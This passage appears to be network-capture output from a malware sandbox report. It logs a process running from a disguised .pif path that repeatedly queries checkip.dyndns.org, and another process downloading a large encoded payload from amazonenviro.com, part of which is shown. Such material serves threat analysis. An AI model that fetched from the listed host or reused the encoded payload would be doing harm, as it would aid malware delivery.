                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:43.289355040 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:44.405309916 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:44 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 1e4b16862992d2b7fbc8c390ed14ff40
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                        Jan 6, 2025 07:53:44.409743071 CET127OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Jan 6, 2025 07:53:44.615020990 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:44 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: cbf59825bcc77b3b83ee71dcc94577d3
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                        Jan 6, 2025 07:53:45.776787996 CET127OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Jan 6, 2025 07:53:45.955096006 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:45 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 531fd7a49ba652f142cfc37f3fa9d680
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        14192.168.2.449790158.101.44.242803980C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:45.375430107 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:45.959875107 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:45 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 6438375760564fdc2117717088ed15dd
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        15192.168.2.449793158.101.44.242803980C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:46.562205076 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:47.801320076 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:47 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 3076fe954d4479a306efcf048e8a773c
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        16192.168.2.449794158.101.44.242807692C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:46.613464117 CET127OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Jan 6, 2025 07:53:48.638231039 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:48 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: e61d4218e4c90b2e3d2e009819310ead
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        17192.168.2.449797158.101.44.242803980C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:48.443300962 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:49.140439034 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:49 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 43e9a560850634501b1b91a1faac75ac
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        18192.168.2.449800158.101.44.242807692C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:49.298682928 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:49.892061949 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:49 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 351067e2e353986ddada01cc863b8f4d
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        19192.168.2.449801158.101.44.242803980C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:49.771998882 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:50.774971008 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:50 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: ba6f793522f1739f7fb2ff6856d69b1a
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        20192.168.2.449803158.101.44.242807692C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:50.507527113 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:52.517304897 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:52 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 0f0d3f0ff178a332698cc2209ba2cce8
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        21192.168.2.449807158.101.44.242807692C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:53.222492933 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:54.550441980 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:54 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 41d9af342a427385c5eade4aff252303
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        22192.168.2.449810158.101.44.242807692C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:55.202835083 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:56.323334932 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:56 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 6259dbadf94e2191af20e40b3dc4e386
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        23192.168.2.449812158.101.44.242807692C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:56.939414024 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:57.517117023 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:57 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 220ccea69bc0e27b1a0b81abcf853691
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        24192.168.2.449815158.101.44.242807692C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 6, 2025 07:53:58.148618937 CET151OUTGET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:58.734035969 CET321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:58 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: d05b1977b027009a1535b362975b373e
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.449744166.62.27.1884437884C:\Windows\SysWOW64\brightness.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:18 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                        Host: amazonenviro.com
                                                                                                                                                                        2025-01-06 06:53:18 UTC269INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:18 GMT
                                                                                                                                                                        Server: Apache
                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                        Last-Modified: Sun, 05 Jan 2025 22:51:42 GMT
                                                                                                                                                                        ETag: "2ca99b3-bf154-62afd5b0ab63f"
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        Content-Length: 782676
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        2025-01-06 06:53:18 UTC7923INData Raw: 37 75 41 62 2b 4b 74 68 6d 62 75 45 65 38 7a 76 74 57 47 56 6b 6c 49 44 69 75 5a 4d 45 42 46 72 53 76 4f 66 31 6d 51 4b 43 35 68 42 45 48 69 39 4d 79 57 6e 50 68 69 42 75 45 59 4b 70 54 6f 54 67 4b 6f 37 45 59 30 74 46 33 65 79 4c 42 47 6d 4f 51 74 33 70 78 6f 2f 73 68 30 35 30 70 64 78 31 47 48 35 4c 55 58 71 37 46 48 41 45 6b 44 57 70 68 55 32 71 51 6f 7a 4d 76 2b 48 54 37 75 6e 73 2b 48 6a 58 43 79 7a 46 66 4e 72 73 55 6a 71 65 52 54 30 65 62 6c 4b 36 6e 4d 67 4b 64 4c 49 4c 42 68 31 5a 2f 2f 59 7a 4b 65 35 5a 33 72 6b 38 45 53 33 34 44 47 6d 35 79 6e 70 77 2b 42 45 6b 4d 6b 39 37 62 47 61 49 48 43 6f 5a 67 64 72 32 43 46 33 79 55 41 6d 4a 4a 53 78 38 65 4a 78 57 50 42 35 78 6b 4b 6d 63 31 38 44 66 72 73 32 6a 48 6f 6a 53 35 76 63 5a 34 36 79 54 31 6d
                                                                                                                                                                        Data Ascii: 7uAb+KthmbuEe8zvtWGVklIDiuZMEBFrSvOf1mQKC5hBEHi9MyWnPhiBuEYKpToTgKo7EY0tF3eyLBGmOQt3pxo/sh050pdx1GH5LUXq7FHAEkDWphU2qQozMv+HT7uns+HjXCyzFfNrsUjqeRT0eblK6nMgKdLILBh1Z//YzKe5Z3rk8ES34DGm5ynpw+BEkMk97bGaIHCoZgdr2CF3yUAmJJSx8eJxWPB5xkKmc18Dfrs2jHojS5vcZ46yT1m
                                                                                                                                                                        2025-01-06 06:53:18 UTC8000INData Raw: 4e 68 35 61 49 6b 6b 7a 48 42 51 70 79 54 31 6b 4a 64 6c 62 62 6b 6a 35 55 68 39 35 4a 69 66 56 55 68 50 51 64 6d 6a 38 49 71 38 79 52 50 4c 33 36 53 4e 52 77 31 6e 31 55 41 58 54 6c 55 4a 51 45 52 41 71 69 6e 63 4a 51 4d 2f 62 31 31 6e 61 75 39 51 70 6b 37 75 30 6d 4a 4e 44 37 67 77 63 53 37 79 2f 74 67 39 39 4e 64 7a 74 2f 65 50 42 31 42 57 78 74 66 65 46 70 51 37 47 47 4d 32 56 37 4e 46 2f 36 33 6c 50 49 63 76 6d 48 69 52 71 6d 66 49 54 48 46 59 30 4a 41 58 79 50 5a 38 76 70 4b 76 66 49 77 6c 5a 2b 79 65 41 77 75 78 6c 6b 57 38 42 56 4e 72 35 6d 7a 30 33 54 33 6c 30 55 51 7a 39 4a 64 68 4d 36 54 39 36 63 54 6e 59 41 4c 69 49 45 58 6e 62 62 57 6a 78 6c 76 34 77 4f 4f 43 66 69 38 6d 2b 32 2b 66 4c 73 41 45 72 5a 52 71 55 72 49 68 73 4c 73 68 36 68 71 35
                                                                                                                                                                        Data Ascii: Nh5aIkkzHBQpyT1kJdlbbkj5Uh95JifVUhPQdmj8Iq8yRPL36SNRw1n1UAXTlUJQERAqincJQM/b11nau9Qpk7u0mJND7gwcS7y/tg99Ndzt/ePB1BWxtfeFpQ7GGM2V7NF/63lPIcvmHiRqmfITHFY0JAXyPZ8vpKvfIwlZ+yeAwuxlkW8BVNr5mz03T3l0UQz9JdhM6T96cTnYALiIEXnbbWjxlv4wOOCfi8m+2+fLsAErZRqUrIhsLsh6hq5
                                                                                                                                                                        2025-01-06 06:53:18 UTC8000INData Raw: 43 7a 34 2b 68 6c 45 6d 45 6a 6b 53 7a 79 6e 30 6a 4f 78 59 79 4f 35 70 67 59 30 6e 6d 6f 74 44 4d 62 4e 4e 4f 4a 43 62 31 4d 58 5a 48 58 62 52 52 54 44 4c 76 57 61 70 38 44 30 38 4b 38 65 4b 67 34 46 5a 74 30 38 63 54 78 58 76 64 77 32 52 7a 79 58 6f 6b 4a 74 64 31 67 5a 61 34 36 32 44 6c 66 2b 7a 75 38 57 49 6b 4a 6e 67 37 39 63 7a 4e 77 6f 69 45 68 49 63 57 6f 6c 54 61 7a 2b 53 6f 78 4f 70 67 70 30 73 4a 58 6e 59 59 38 66 53 57 2f 53 31 2f 50 4e 61 62 77 39 39 44 4b 50 42 42 6e 6e 4b 68 78 6c 67 67 70 68 77 70 74 2b 5a 66 75 2f 57 74 35 37 6a 72 63 6c 57 55 52 44 2b 5a 39 7a 6e 34 4a 61 4a 6a 76 51 58 2f 35 37 69 32 52 57 36 7a 32 2b 4a 6e 30 33 37 7a 4e 6d 6b 48 49 48 78 76 48 33 78 6a 42 56 7a 67 6b 33 49 31 72 59 71 2b 76 38 49 4d 6f 47 49 6a 50 66
                                                                                                                                                                        Data Ascii: Cz4+hlEmEjkSzyn0jOxYyO5pgY0nmotDMbNNOJCb1MXZHXbRRTDLvWap8D08K8eKg4FZt08cTxXvdw2RzyXokJtd1gZa462Dlf+zu8WIkJng79czNwoiEhIcWolTaz+SoxOpgp0sJXnYY8fSW/S1/PNabw99DKPBBnnKhxlggphwpt+Zfu/Wt57jrclWURD+Z9zn4JaJjvQX/57i2RW6z2+Jn037zNmkHIHxvH3xjBVzgk3I1rYq+v8IMoGIjPf
